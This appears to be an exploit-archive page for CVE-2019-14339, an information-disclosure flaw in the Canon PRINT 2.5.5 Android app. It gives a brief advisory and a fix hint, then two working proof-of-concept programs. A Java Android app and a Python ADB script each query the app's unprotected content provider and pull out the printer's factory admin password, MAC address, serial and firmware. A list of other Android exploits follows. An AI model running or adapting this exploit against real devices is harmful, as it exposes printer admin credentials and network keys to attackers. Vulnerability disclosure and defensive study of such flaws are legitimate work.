Menu

Search for hundreds of thousands of exploits

"Canon PRINT 2.5.5 - Information Disclosure"

Author

0x48piraj

Platform

android

Release date

2019-08-30

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
# Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5
(CVE-2019-14339)
# Date: 24th July, 2019
# Exploit Author: 0x48piraj
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app
# Software Link: https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint
<https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint&hl=en_IN>#
Exploit : https://github.com/0x48piraj/CVE-2019-14339
# Version: Canon PRINT 2.5.5
# Tested on: Android 8.0.0
# CVE : CVE-2019-14339

The ContentProvider in the Canon PRINT 2.5.5 application for Android
does not properly restrict data access. This allows an attacker's
malicious application to obtain sensitive information including
factory passwords for administrator web-interface and WPA2-PSK key.
The mobile application contains unprotected exported content providers
('IJPrinterCapabilityProvider' in android/AndroidManifest.xml) that
discloses sensitive applications data under certain conditions. To
securely export the content provider, one should restrict access to it
by setting up android:protectionLevel or android:grantUriPermissions
attributes in Android Manifest file.

-- Proof-of-concept code (Java)

--

package cannon.print.pwn;

import android.database.Cursor;
import android.net.Uri;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import android.widget.Toast;
import org.apache.commons.lang3.StringUtils; //
https://stackoverflow.com/a/50198499

public class MainActivity extends AppCompatActivity {

    Button PwnBtn;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        PwnBtn = (Button) findViewById(R.id.button);
        PwnBtn.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                Toast.makeText(getApplicationContext(), "Payload
triggered ...", Toast.LENGTH_SHORT).show();
                Uri cannonURI =
Uri.parse("content://canon.ij.printer.capability.data/");
                Cursor cursor = getContentResolver().query(cannonURI,
null, null, null, null);
                int count  = cursor.getCount();
                TextView data=(TextView)findViewById(R.id.data);
                data.setText(String.valueOf(count));
                cursor.moveToFirst();
                String tempstr = " ";
                tempstr ="  "+tempstr +"\t"+ cursor.getString(0) + "\t\t\t"
                        + cursor.getString(1) + "\t\t\t" + cursor.getString(2);
                String dpw = StringUtils.substringBetween(tempstr,
"<ivec:product_serialnumber>", "</ivec:product_serialnumber>");
                String dmac = cursor.getString(4);
                String mdeviceid = cursor.getString(13); // raw
                String dtype = StringUtils.substringBetween(mdeviceid,
";CLS:", ";DES");
                String timestamp = cursor.getString(15); // ticks,
device last used
                String dclass = StringUtils.substringBetween(tempstr,
"<ivec:manufacturer>", "</ivec:manufacturer>");
                String dmodel = StringUtils.substringBetween(tempstr,
"<ivec:model>", "</ivec:model>");
                String dserial = StringUtils.substringBetween(tempstr,
"<ivec:serialnumber>", "</ivec:serialnumber>");
                String dfmver = StringUtils.substringBetween(tempstr,
"<ivec:firmver>", "</ivec:firmver>");
                String dservice =
StringUtils.substringBetween(tempstr, "<ivec:service>",
"</ivec:service>");
                /* More juicy data
                String denv = StringUtils.substringBetween(tempstr,
"<vcn:host_environment>", "</vcn:host_environment>");
                String dpapertype =
StringUtils.substringBetween(tempstr, "<ivec:papertype>",
"</ivec:papertype>");
                String dformats =
StringUtils.substringBetween(tempstr, "<ivec:support_data_format>",
"</ivec:support_data_format>");
                */
                String fout = String.format("Device Type : %s\nDevice
Class : %s\nDevice Model : %s\nDevice Serial : %s\nDevice MAC Address
: %s\nDevice Factory Password : %s\nDevice Firmware Version :
%s\nDevice Services : %s\nDevice Last Used : %s\n", dtype, dclass,
dmodel, dserial, dmac, dpw, dfmver, dservice, timestamp);
                data.setText(fout);
            }
        });
    }
}

-- Proof-of-concept python script over ADB --

import subprocess, datetime, sys

def ext(out, var, rw=';'):
    return out.split(var)[1].split(rw)[0]

print("[#] Make sure you've connected the target device w/ adb ...")
print("[*] Running the exploit using adb ...\n\n")
out = subprocess.getoutput("adb shell content query --uri content://canon.ij.printer.capability.data/")

if "<ivec:contents>" not in out:
    print("[!] Error: Couldn't fetch data from adb ...")
    sys.exit(1)

varz = [";CLS:", ";MDL:", ";DES:", ";VER:", ";PSE:"] #
factory_pw_check =
out.split("<ivec:product_serialnumber>")[1].split('</ivec:product_serialnumber>')[0]
prmz = ["Class", "Model", "Description", "Firmware Version", "Factory Password"]
for prm, var in zip(prmz, varz):
	print(" -- Device %s : %s" % (prm, ext(out, var)))
print(" -- Device MAC Address : {}".format(ext(out, 'mmacaddress=', ',')))
print(" -- Device Last Used : %s" % (datetime.timedelta(microseconds =
int(ext(out,', timestamp=', ', '))/10)))
Release Date Title Type Platform Author
2019-08-30 "Canon PRINT 2.5.5 - Information Disclosure" local android 0x48piraj
2019-07-15 "Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write" dos android "Marcin Kozlowski"
2019-05-28 "EquityPandit 1.0 - Password Disclosure" local android ManhNho
2019-05-29 "Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL" dos android "Google Security Research"
2019-05-16 "WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service" dos android "Hong Nhat Pham"
2019-03-06 "Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass" dos android "Google Security Research"
2019-03-06 "Android - binder Use-After-Free via racy Initialization of ->allow_user_free" dos android "Google Security Research"
2019-02-28 "FTP Server 1.32 - Denial of Service" dos android s4vitar
2019-02-21 "AirDrop 2.0 - Denial of Service (DoS)" dos android s4vitar
2019-02-21 "ScreenStream 3.0.15 - Denial of Service" dos android s4vitar
2019-02-20 "Android Kernel < 4.8 - ptrace seccomp Filter Bypass" dos android "Google Security Research"
2019-02-15 "AirMore 1.6.1 - Denial of Service (PoC)" dos android s4vitar
2019-02-14 "ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)" dos android s4vitar
2019-02-12 "Android - binder Use-After-Free of VMA via race Between reclaim and munmap" dos android "Google Security Research"
2019-02-12 "Android - binder Use-After-Free via fdget() Optimization" dos android "Google Security Research"
2019-02-11 "AirDroid 4.2.1.6 - Denial of Service" dos android s4vitar
2019-01-15 "1Password < 7.0 - Denial of Service" dos android "Valerio Brussani"
2015-07-06 "AirDroid - Arbitrary File Upload" webapps android "Parsa Adib"
2011-11-28 "Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities" webapps android "Thomas Cannon"
2017-09-20 "Android Bluetooth - 'Blueborne' Information Leak (2)" remote android "Kert Ojasoo"
2017-08-09 "Android Bluetooth - 'Blueborne' Information Leak (1)" remote android "Kert Ojasoo"
2018-04-06 "LineageOS 14.1 Blueborne - Remote Code Execution" remote android "Marcin Kozlowski"
2018-02-25 "Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record" remote android iamrastating
2017-07-20 "Virtual Postage (VPA) - Man In The Middle Remote Code Execution" remote android intern0t
2017-07-20 "SKILLS.com.au Industry App - Man In The Middle Remote Code Execution" remote android intern0t
2017-06-30 "Australian Education App - Remote Code Execution" remote android intern0t
2017-06-30 "BestSafe Browser - Man In The Middle Remote Code Execution" remote android intern0t
2017-06-14 "Google Chrome - V8 Private Property Arbitrary Code Execution" remote android Qihoo360
2017-06-30 "eVestigator Forensic PenTester - Man In The Middle Remote Code Execution" remote android intern0t
2017-12-20 "Samsung Internet Browser - SOP Bypass (Metasploit)" remote android "Dhiraj Mishra"
Release Date Title Type Platform Author
2019-08-30 "Canon PRINT 2.5.5 - Information Disclosure" local android 0x48piraj
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47321/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47321/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47321/41685/canon-print-255-information-disclosure/download/", "exploit_id": "47321", "exploit_description": "\"Canon PRINT 2.5.5 - Information Disclosure\"", "exploit_date": "2019-08-30", "exploit_author": "0x48piraj", "exploit_type": "local", "exploit_platform": "android", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse